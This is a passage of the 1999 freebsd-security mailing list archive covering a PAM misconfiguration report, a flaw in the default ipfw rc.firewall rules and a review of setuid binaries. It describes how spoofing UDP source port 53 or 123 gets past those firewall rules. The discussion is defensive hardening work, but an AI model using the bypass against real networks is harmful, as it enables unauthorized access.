Bye, Alexander. -- So many Christians, so few lions. http://netchild.home.pages.de A.Leidinger+Home @ WJPServer.CS.Uni-SB.de Key fingerprint = 7423 F3E6 3A7E B334 A9CC B10A 1F5F 130A A638 6E7E To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 6:26: 9 1999 Delivered-To: freebsd-security@freebsd.org Received: from baga.unet.ru (baga.unet.ru [195.9.254.56]) by hub.freebsd.org (Postfix) with ESMTP id 7FAB214A06 for ; Mon, 1 Nov 1999 06:25:57 -0800 (PST) (envelope-from vick@unet.ru) Received: from unet.ru (baga.unet.ru [195.9.254.56]) by baga.unet.ru (8.9.3/Unet) with ESMTP id RAA07606 for ; Mon, 1 Nov 1999 17:25:54 +0300 (MSK) (envelope-from vick@unet.ru) Message-ID: <381DA2F1.5CA8A8D@unet.ru> Date: Mon, 01 Nov 1999 17:25:54 +0300 From: VicTor Ponomarev Organization: LPI & Unet Ltd. X-Mailer: Mozilla 4.61 [en] (X11; I; FreeBSD 3.3-UNET i386) X-Accept-Language: en MIME-Version: 1.0 To: security@freebsd.org Subject: PAM and security hole in 3.3 stable Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Comment line login auth required pam_unix.so try_first_pas in pam.conf and you can login from any terminal without password. It seems that pam_cleartext_pass_ok.so library opens a security hole to the box. Bye, Vick. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 7:17:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id 0C94115085 for ; Mon, 1 Nov 1999 07:16:59 -0800 (PST) (envelope-from adam@algroup.co.uk) Received: from algroup.co.uk ([193.195.56.225]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id PAA02383 for ; Mon, 1 Nov 1999 15:16:58 GMT Message-ID: <381DAEE9.75C2EDA5@algroup.co.uk> Date: Mon, 01 Nov 1999 15:16:57 +0000 From: Adam Laurie Organization: A.L. Group plc X-Mailer: Mozilla 4.07 [en] (Win95; I) MIME-Version: 1.0 To: Group Paranoia Subject: hole(s) in default rc.firewall rules Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org *, It seems to me that the following rules (and multiple variations) provide a Great Big Hole(tm) through ipfw into your UDP services... # Allow DNS queries out in the world $fwcmd add pass udp from any 53 to ${ip} $fwcmd add pass udp from ${ip} to any 53 # Allow NTP queries out in the world $fwcmd add pass udp from any 123 to ${ip} $fwcmd add pass udp from ${ip} to any 123 By setting their source port to 53 or 123, an attacker can bypass your firewall and connect to any UDP listener. I propose the following alternative: # Block low port incoming UDP (and NFS) but allow replies for DNS, NTP # and all other high ports. Allow outgoing UDP. $fwcmd add pass udp from any to ${ip} 123 $fwcmd add deny udp from any to ${ip} 0-1023,1110,2049 $fwcmd add pass udp from any to any cheers, Adam -- Adam Laurie Tel: +44 (181) 742 0755 A.L. Digital Ltd. Fax: +44 (181) 742 5995 Voysey House Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 7:22:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 2BD0D14FD8 for ; Mon, 1 Nov 1999 07:22:40 -0800 (PST) (envelope-from sthaug@nethelp.no) Received: (qmail 46578 invoked by uid 1001); 1 Nov 1999 15:22:37 +0000 (GMT) To: adam@algroup.co.uk Cc: security@FreeBSD.ORG Subject: Re: hole(s) in default rc.firewall rules From: sthaug@nethelp.no In-Reply-To: Your message of "Mon, 01 Nov 1999 15:16:57 +0000" References: <381DAEE9.75C2EDA5@algroup.co.uk> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Mon, 01 Nov 1999 16:22:37 +0100 Message-ID: <46576.941469757@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > By setting their source port to 53 or 123, an attacker can bypass your > firewall and connect to any UDP listener. > > I propose the following alternative: > > # Block low port incoming UDP (and NFS) but allow replies for DNS, > NTP > # and all other high ports. Allow outgoing UDP. > $fwcmd add pass udp from any to ${ip} 123 > $fwcmd add deny udp from any to ${ip} 0-1023,1110,2049 > $fwcmd add pass udp from any to any If you block incoming UDP traffic with source port 53, you have very effectively blocked answers from all name servers outside your firewall. Is that what you want to do? Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 7:37:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id 1B87414FD8 for ; Mon, 1 Nov 1999 07:37:55 -0800 (PST) (envelope-from adam@algroup.co.uk) Received: from algroup.co.uk ([193.195.56.225]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id PAA03288; Mon, 1 Nov 1999 15:37:23 GMT Message-ID: <381DB3B2.10002A43@algroup.co.uk> Date: Mon, 01 Nov 1999 15:37:22 +0000 From: Adam Laurie Organization: A.L. Group plc X-Mailer: Mozilla 4.07 [en] (Win95; I) MIME-Version: 1.0 To: sthaug@nethelp.no Cc: security@FreeBSD.ORG Subject: Re: hole(s) in default rc.firewall rules References: <381DAEE9.75C2EDA5@algroup.co.uk> <46576.941469757@verdi.nethelp.no> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org sthaug@nethelp.no wrote: > > > By setting their source port to 53 or 123, an attacker can bypass your > > firewall and connect to any UDP listener. > > > > I propose the following alternative: > > > > # Block low port incoming UDP (and NFS) but allow replies for DNS, > > NTP > > # and all other high ports. Allow outgoing UDP. > > $fwcmd add pass udp from any to ${ip} 123 > > $fwcmd add deny udp from any to ${ip} 0-1023,1110,2049 > > $fwcmd add pass udp from any to any > > If you block incoming UDP traffic with source port 53, you have very > effectively blocked answers from all name servers outside your firewall. > Is that what you want to do? No, and it doesn't. I'm not blocking anything based on source port. I'm blocking UDP traffic to any low port. DNS replies come in on high ports (at least this is true on the half dozen or so boxes that I've implemented this on, whether they are NAT/firewall boxes, or stand alone PCs). NTP, on the other hand, comes in on 123, which is why I've specifically allowed it. cheers, Adam -- Adam Laurie Tel: +44 (181) 742 0755 A.L. Digital Ltd. Fax: +44 (181) 742 5995 Voysey House Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 8:17: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from anarcat.dyndns.org (phobos.IRO.UMontreal.CA [132.204.20.20]) by hub.freebsd.org (Postfix) with ESMTP id C36C014BFA for ; Mon, 1 Nov 1999 08:16:35 -0800 (PST) (envelope-from spidey@anarcat.dyndns.org) Received: by anarcat.dyndns.org (Postfix, from userid 1000) id 70BD81BD9; Mon, 1 Nov 1999 11:17:28 -0500 (EST) From: Spidey MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14365.48408.87230.710344@anarcat.dyndns.org> Date: Mon, 1 Nov 1999 11:17:28 -0500 (EST) To: peter.jeremy@alcatel.com.au Cc: freebsd-security@FreeBSD.ORG Subject: Re: Examining FBSD set[ug]ids and their use References: <14364.64172.638014.558487@anarcat.dyndns.org> <99Nov1.143118est.40332@border.alcanet.com.au> X-Mailer: VM 6.72 under 21.1 "20 Minutes to Nikko" XEmacs Lucid (patch 2) Reply-To: Spidey Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --- Big Brother told Peter Jeremy to write, at 14:36 of November 1: > On 1999-Nov-01 13:27:56 +1100, Spidey wrote: > >I started 'compiling' some info about the use of the setuid and setgid > >files in FreeBSD. > > An excellent idea. Note that some of the files you specify are > ports. Yes. I should have mentionned it maybe... I think we should do the same for all ports, and even more. I was thinking of putting a warning message in the port's makefile itself when there's a setuid installed. > As a general rule, anything that is setgid kmem should be converted > to a new sysctl with an unprivileged task to access it. Hum. I don't know.. wouldn't that give a widespread access? When we can simply turn the suid bit off certain binaries? > ># Allow users to see processes? Users cannot see the 'STARTED' and > ># 'TIME' columns, from ps aux... I don't want to dig much more.. > > ps gname=kmem mode=2555 > > I believe it's necessary for users to see other users' processes. > The information should probably be available via /proc instead. For that I don't know really... But yes, /proc could be a quite good solution. Is it possible to enforce file permissions on /proc? :)) > ># I don't have a ccd... I can't test this. > > ccdconfig gname=kmem > > Probably unnecessary. No-one but root needs to be able to run ccdconfig. That's what I thought too! > ># Allow users to dump on remote (see dump(1), the BUGS section) > > dump gname=tty > > rdump gname=tty > > restore gname=tty > > rrestore gname=tty > > As I recall it, this is to allow dump/restore to write to the console > (and wake up the operator) when it needs feeding. Ah! That's a fact.... I thought it was for remotes, as rsh or rlogin, to bind on a privilege port. But then, they would have to be suid root!!! > ># Allow users to bind on a socket (which? where?) > > ping mode=4555 > Needed to allow ordinary mortals to sent raw IP (ICMP) packets. I don't think this should be enable by default... on a shell box, this could cause some pretty dense headaches... > ># Allow users to consult routing tables > > route mode=4555 > > Needed to allow ordinary mortals to access the routing socket. > This is probably another sysctl candidate. Great. I'm learning. :) > ># ????? Look what's here?! > > Xwrapper mode=4711 > > This is a wrapper for the X-server. The idea is that Xwrapper is > slightly smaller :-) and less subject to security holes. Ok. But what is its use??? Is it used by X? Why is it suid? > ># Allow users to read master.passwd, skeykeys and probably other > ># things... > > login > > Necessary to allow users to log in as another user. > > ># Allow users to read the mail queue > ># Again, this is part of the sendmail suite and _can_ be replaced :) > > mailq > > Hard link to newaliases and sendmail. Only needs root for local > mail delivery in the absence of a setuid local delivery agent. > (It's fairly trivial to sandbox sendmail). Hum.. Indeed. I never thought of that. I think that sendmail should be run in a sandbox, as it is a complex system open to the network... > ># Allow users to use the catman cache > ^^^ update > > man uname=man Indeed. > ># Allow users to 'read' /etc/master.passwd > > su > Actually it's to allow users to change thir uid. Also. > ># I never understood what uucp was.... > >/set mode=4555 uname=uucp gname=wheel > > uucp > > uuname > > uustat gname=dialer mode=6555 > > uux > > UUCP lives in it's own sandbox. Ok. but what _is it_? Why does it needs special permissions? > ># "Gaming" management > > dm > > All games live in their own group for sandboxing. > > ># This is the sendmail super-program that does everything. Get rid of > ># it, install postfix.. :) > Religious comments don't belong in a file being touted as a part > of generic FreeBSD. That is a fact. But I never even hoped to see that file in generic FreeBSD. The final one won't have these comments. Thanks for yours. AnarCat. -- Si l'image donne l'illusion de savoir C'est que l'adage pretend que pour croire, L'important ne serait que de voir Lofofora To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 8:22:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from anarcat.dyndns.org (phobos.IRO.UMontreal.CA [132.204.20.20]) by hub.freebsd.org (Postfix) with ESMTP id 8B86314BFA for ; Mon, 1 Nov 1999 08:22:42 -0800 (PST) (envelope-from spidey@anarcat.dyndns.org) Received: by anarcat.dyndns.org (Postfix, from userid 1000) id 2CD791BD9; Mon, 1 Nov 1999 11:23:35 -0500 (EST) From: Spidey MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Message-ID: <14365.48774.58061.591204@anarcat.dyndns.org> Date: Mon, 1 Nov 1999 11:23:34 -0500 (EST) To: A.Leidinger@WJPServer.CS.Uni-SB.de Cc: freebsd-security@FreeBSD.ORG Subject: Re: Examining FBSD set[ug]ids and their use References: <14364.64172.638014.558487@anarcat.dyndns.org> <199911010922.KAA01423@work.net.local> X-Mailer: VM 6.72 under 21.1 "20 Minutes to Nikko" XEmacs Lucid (patch 2) Reply-To: Spidey Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ok. Thanks. The thing is not there anymore because I moved my sendmail binary... --- Big Brother told A.Leidinger@WJPServer.CS.Uni-SB.de to write, at 10= :22 of November 1: > On 31 Oct, Spidey wrote: >=20 > Oops... deleted to much from the previous mail... >=20 > > # That's another binary that just disappeared from my box. I don't > > # know why. > > =09=09=09purgestat >=20 > Belongs to sendmail too, it purges the hoststats. >=20 > It=B4s suid, but it gives a "Permission denied" if you try to exec it= as > an ordinary user. >=20 > Bye, > Alexander. >=20 > --=20 > So many Christians, so few lions. >=20 > http://netchild.home.pages.de A.Leidinger+Home @ WJPServer.CS.Uni-SB= .de > Key fingerprint =3D 7423 F3E6 3A7E B334 A9CC B10A 1F5F 130A A638 6= E7E --=20 Si l'image donne l'illusion de savoir C'est que l'adage pretend que pour croire, L'important ne serait que de voir Lofofora To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 8:40: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id D1F3E14F56 for ; Mon, 1 Nov 1999 08:39:57 -0800 (PST) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.3/8.9.3) with ESMTP id RAA04565; Mon, 1 Nov 1999 17:39:56 +0100 (CET) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id RAA73489; Mon, 1 Nov 1999 17:39:55 +0100 (MET) Date: Mon, 1 Nov 1999 17:39:55 +0100 From: Eivind Eklund To: Spidey Cc: freebsd-security@FreeBSD.ORG Subject: Re: Examining FBSD set[ug]ids and their use Message-ID: <19991101173955.L72085@bitbox.follo.net> References: <14364.64172.638014.558487@anarcat.dyndns.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <14364.64172.638014.558487@anarcat.dyndns.org>; from beaupran@jsp.umontreal.ca on Sun, Oct 31, 1999 at 09:27:56PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Oct 31, 1999 at 09:27:56PM -0500, Spidey wrote: > # The suid bit is NOT necessary for any usage I could find... > df gname=operator mode=2555 The suid bit is necessary for users to be able to inspect the amount of disk space free on unmounted disks. Personally, I don't think users should be allowed to see the amount of disk space free on unmounted disks unless they are in group operator themselves. If I don't get any disagreement, I will remove this setuid bit. > /set gname=tty > # Allow users to dump on remote (see dump(1), the BUGS section) > dump gname=tty > rdump gname=tty > restore gname=tty > rrestore gname=tty > # High scores management > sol uname=games gname=games mode=6755 This looks like a bug in some port, actually. We shouldn't normally have anything that is setuid games, only setgid. > # Allow users to read master.passwd > xlock mode=4111 A separate system for verifying a user's own password would be infinitely desirable. I suggest something as simple as a small executable that verify the password, and automatically touch a file so it can't be called more than reasonable for interactive verification. > # Allow users to regenerate the aliases database. > # Why the hell should anyone else than the one that has modified the > # database would want to rebuild it???? > newaliases The alias files can be group writable. > # Same as rsh and such. > ssh1 mode=4711 Not quite. ssh uses this to get at the local host key, and authenticate that it is run with that key or the attacker has control over the entire host (by using a privileged port as the source port). Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 8:43: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from anarcat.dyndns.org (phobos.IRO.UMontreal.CA [132.204.20.20]) by hub.freebsd.org (Postfix) with ESMTP id B9F4D14F94 for ; Mon, 1 Nov 1999 08:42:57 -0800 (PST) (envelope-from spidey@anarcat.dyndns.org) Received: by anarcat.dyndns.org (Postfix, from userid 1000) id 7B4B51BDA; Mon, 1 Nov 1999 11:43:52 -0500 (EST) From: Spidey MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Message-ID: <14365.49990.500729.209222@anarcat.dyndns.org> Date: Mon, 1 Nov 1999 11:43:50 -0500 (EST) To: A.Leidinger@WJPServer.CS.Uni-SB.de Cc: freebsd-security@FreeBSD.ORG Subject: Re: Examining FBSD set[ug]ids and their use References: <14364.64172.638014.558487@anarcat.dyndns.org> <199911010922.KAA01423@work.net.local> X-Mailer: VM 6.72 under 21.1 "20 Minutes to Nikko" XEmacs Lucid (patch 2) Reply-To: Spidey Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Then why is it suid if a regular user can't run it anyway?? Is it a link to sendmail? --- Big Brother told A.Leidinger@WJPServer.CS.Uni-SB.de to write, at 10= :22 of November 1: > On 31 Oct, Spidey wrote: >=20 > Oops... deleted to much from the previous mail... >=20 > > # That's another binary that just disappeared from my box. I don't > > # know why. > > =09=09=09purgestat >=20 > Belongs to sendmail too, it purges the hoststats. >=20 > It=B4s suid, but it gives a "Permission denied" if you try to exec it= as > an ordinary user. >=20 > Bye, > Alexander. >=20 > --=20 > So many Christians, so few lions. >=20 > http://netchild.home.pages.de A.Leidinger+Home @ WJPServer.CS.Uni-SB= .de > Key fingerprint =3D 7423 F3E6 3A7E B334 A9CC B10A 1F5F 130A A638 6= E7E --=20 Si l'image donne l'illusion de savoir C'est que l'adage pretend que pour croire, L'important ne serait que de voir Lofofora To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 8:55:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from anarcat.dyndns.org (phobos.IRO.UMontreal.CA [132.204.20.20]) by hub.freebsd.org (Postfix) with ESMTP id 729EE152CF; Mon, 1 Nov 1999 08:55:11 -0800 (PST) (envelope-from spidey@anarcat.dyndns.org) Received: by anarcat.dyndns.org (Postfix, from userid 1000) id 8A3AA1BDA; Mon, 1 Nov 1999 11:56:04 -0500 (EST) From: Spidey MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14365.50723.872972.30971@anarcat.dyndns.org> Date: Mon, 1 Nov 1999 11:56:03 -0500 (EST) To: Eivind Eklund Cc: freebsd-security@FreeBSD.ORG Subject: Re: Examining FBSD set[ug]ids and their use References: <14364.64172.638014.558487@anarcat.dyndns.org> <19991101173955.L72085@bitbox.follo.net> X-Mailer: VM 6.72 under 21.1 "20 Minutes to Nikko" XEmacs Lucid (patch 2) Reply-To: Spidey Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --- Big Brother told Eivind Eklund to write, at 17:39 of November 1: > On Sun, Oct 31, 1999 at 09:27:56PM -0500, Spidey wrote: > > # The suid bit is NOT necessary for any usage I could find... > > df gname=operator mode=2555 > > The suid bit is necessary for users to be able to inspect the amount > of disk space free on unmounted disks. I must be missing something here. When a disk is unmounted, it does not appear in the df output, no? > Personally, I don't think users should be allowed to see the amount of > disk space free on unmounted disks unless they are in group operator > themselves. > > If I don't get any disagreement, I will remove this setuid bit. I agree. > > # High scores management > > sol uname=games gname=games mode=6755 > > This looks like a bug in some port, actually. We shouldn't normally > have anything that is setuid games, only setgid. Oh. And why? BTW, there's also cconq, xconq and yamsweeper that are setuid gnames. > > # Allow users to read master.passwd > > xlock mode=4111 > > A separate system for verifying a user's own password would be > infinitely desirable. I suggest something as simple as a small > executable that verify the password, and automatically touch a file so > it can't be called more than reasonable for interactive verification. Yes. I found very surprising that xlock would _need_ to be setuid... > > # Allow users to regenerate the aliases database. > > # Why the hell should anyone else than the one that has modified the > > # database would want to rebuild it???? > > newaliases > > The alias files can be group writable. But it is not by default. So I don't think that newaliases should be suid. But we miss the point here anyways: newaliases is a link to sendmail, so... > > # Same as rsh and such. > > ssh1 mode=4711 > > Not quite. ssh uses this to get at the local host key, and > authenticate that it is run with that key or the attacker has control > over the entire host (by using a privileged port as the source port). Ok. You know it.. :) I will correct some stuff, I think... -- Si l'image donne l'illusion de savoir C'est que l'adage pretend que pour croire, L'important ne serait que de voir Lofofora To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 9: 6:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from anarcat.dyndns.org (phobos.IRO.UMontreal.CA [132.204.20.20]) by hub.freebsd.org (Postfix) with ESMTP id 3D35314F94 for ; Mon, 1 Nov 1999 09:06:09 -0800 (PST) (envelope-from spidey@anarcat.dyndns.org) Received: by anarcat.dyndns.org (Postfix, from userid 1000) id 84814194F; Mon, 1 Nov 1999 12:07:04 -0500 (EST) From: Spidey MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14365.51383.482073.902049@anarcat.dyndns.org> Date: Mon, 1 Nov 1999 12:07:03 -0500 (EST) To: peter.jeremy@alcatel.com.au Cc: freebsd-security@FreeBSD.ORG Subject: Re: Examining FBSD set[ug]ids and their use References: <14364.64172.638014.558487@anarcat.dyndns.org> <99Nov1.143118est.40332@border.alcanet.com.au> X-Mailer: VM 6.72 under 21.1 "20 Minutes to Nikko" XEmacs Lucid (patch 2) Reply-To: Spidey Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The latest version of the setugid.txt file is available at: http://www.iro.umontreal.ca/~beaupran/FreeBSD/setugid.txt Please, again, your comments are what makes this file worth it... :) The AnarCat -- Si l'image donne l'illusion de savoir C'est que l'adage pretend que pour croire, L'important ne serait que de voir Lofofora To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 9:40:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id A5A6414CCB for ; Mon, 1 Nov 1999 09:40:33 -0800 (PST) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.3/8.9.3) with ESMTP id SAA05429; Mon, 1 Nov 1999 18:40:32 +0100 (CET) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id SAA73968; Mon, 1 Nov 1999 18:40:31 +0100 (MET) Date: Mon, 1 Nov 1999 18:40:31 +0100 From: Eivind Eklund To: Spidey Cc: freebsd-security@FreeBSD.ORG Subject: Re: Examining FBSD set[ug]ids and their use Message-ID: <19991101184031.O72085@bitbox.follo.net> References: <14364.64172.638014.558487@anarcat.dyndns.org> <19991101173955.L72085@bitbox.follo.net> <14365.50723.872972.30971@anarcat.dyndns.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <14365.50723.872972.30971@anarcat.dyndns.org>; from beaupran@jsp.umontreal.ca on Mon, Nov 01, 1999 at 11:56:03AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Nov 01, 1999 at 11:56:03AM -0500, Spidey wrote: > --- Big Brother told Eivind Eklund to write, at 17:39 of November 1: > > On Sun, Oct 31, 1999 at 09:27:56PM -0500, Spidey wrote: > > > # The suid bit is NOT necessary for any usage I could find... > > > df gname=operator mode=2555 > > > > The suid bit is necessary for users to be able to inspect the amount > > of disk space free on unmounted disks. > > I must be missing something here. When a disk is unmounted, it does > not appear in the df output, no? No, but a user can explictly run df against an unmounted file system. (Not after I get my dirty fingers out of -current, though). > > > # High scores management > > > sol uname=games gname=games mode=6755 > > > > This looks like a bug in some port, actually. We shouldn't normally > > have anything that is setuid games, only setgid. > > Oh. And why? Because somebody getting an extra group makes less harm than them getting an extra UID - an extra GID lets them get extra access, while an alternative UID give them extra access *and* lets them hide who they are. Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 9:47:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from anarcat.dyndns.org (phobos.IRO.UMontreal.CA [132.204.20.20]) by hub.freebsd.org (Postfix) with ESMTP id 63DB514D0F; Mon, 1 Nov 1999 09:47:27 -0800 (PST) (envelope-from spidey@anarcat.dyndns.org) Received: by anarcat.dyndns.org (Postfix, from userid 1000) id C21331BD7; Mon, 1 Nov 1999 12:48:16 -0500 (EST) From: Spidey MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14365.53855.175577.614259@anarcat.dyndns.org> Date: Mon, 1 Nov 1999 12:48:15 -0500 (EST) To: Eivind Eklund Cc: freebsd-security@FreeBSD.ORG Subject: Re: Examining FBSD set[ug]ids and their use References: <14364.64172.638014.558487@anarcat.dyndns.org> <19991101173955.L72085@bitbox.follo.net> <14365.50723.872972.30971@anarcat.dyndns.org> <19991101184031.O72085@bitbox.follo.net> X-Mailer: VM 6.72 under 21.1 "20 Minutes to Nikko" XEmacs Lucid (patch 2) Reply-To: Spidey Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --- Big Brother told Eivind Eklund to write, at 18:40 of November 1: > On Mon, Nov 01, 1999 at 11:56:03AM -0500, Spidey wrote: > > --- Big Brother told Eivind Eklund to write, at 17:39 of November 1: > > > On Sun, Oct 31, 1999 at 09:27:56PM -0500, Spidey wrote: > > > > # The suid bit is NOT necessary for any usage I could find... > > > > df gname=operator mode=2555 > > > > > > The suid bit is necessary for users to be able to inspect the amount > > > of disk space free on unmounted disks. > > > > I must be missing something here. When a disk is unmounted, it does > > not appear in the df output, no? > > No, but a user can explictly run df against an unmounted file system. > (Not after I get my dirty fingers out of -current, though). Ah. I never witness this behavior. I'll try it.. :) > > > > # High scores management > > > > sol uname=games gname=games mode=6755 > > > > > > This looks like a bug in some port, actually. We shouldn't normally > > > have anything that is setuid games, only setgid. > > > > Oh. And why? > > Because somebody getting an extra group makes less harm than them > getting an extra UID - an extra GID lets them get extra access, while > an alternative UID give them extra access *and* lets them hide who > they are. That is a fact. Then there's a hell of a cleaning up to do in the game ports!! It seems quite a lot of them install with suid games privileges... Should I send this list to -ports? AnarCat -- Si l'image donne l'illusion de savoir C'est que l'adage pretend que pour croire, L'important ne serait que de voir Lofofora To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 9:47:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id 28A7714F16 for ; Mon, 1 Nov 1999 09:47:28 -0800 (PST) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 3.040 #1) id 11iLXy-000PEv-00; Mon, 01 Nov 1999 19:47:10 +0200 From: Sheldon Hearn To: VicTor Ponomarev Cc: security@FreeBSD.ORG Subject: Re: PAM and security hole in 3.3 stable In-reply-to: Your message of "Mon, 01 Nov 1999 17:25:54 +0300." <381DA2F1.5CA8A8D@unet.ru> Date: Mon, 01 Nov 1999 19:47:10 +0200 Message-ID: <97024.941478430@axl.noc.iafrica.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 01 Nov 1999 17:25:54 +0300, VicTor Ponomarev wrote: > Comment line > login auth required pam_unix.so try_first_pas > in pam.conf and you can login from any terminal without password. When you comment that line out out of the stock pam.conf, there are no required authentication methods configured. Looks like it DTRT to me. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 11: 6:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from g23.relcom.ru (g23.relcom.ru [193.125.152.117]) by hub.freebsd.org (Postfix) with ESMTP id B46FB15359 for ; Mon, 1 Nov 1999 11:05:46 -0800 (PST) (envelope-from vick@unet.ru) Received: from d13.z194-58-229.relcom.ru (d13.z194-58-229.relcom.ru [194.58.229.13]) by g23.relcom.ru (8.8.8/Relcom-2A) with ESMTP id VAA21921 ;Mon, 1 Nov 1999 21:57:51 +0300 (MSK) Message-ID: <381DF13B.C5C1F4C9@unet.ru> Date: Mon, 01 Nov 1999 22:59:56 +0300 From: Victor Ponomarev X-Mailer: Mozilla 4.61 [en] (OS/2; I) X-Accept-Language: en MIME-Version: 1.0 To: Sheldon Hearn Cc: security@FreeBSD.ORG Subject: Re: PAM and security hole in 3.3 stable References: <97024.941478430@axl.noc.iafrica.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sorry, you quite right. Thanks, Vick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 11:27:13 1999 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org 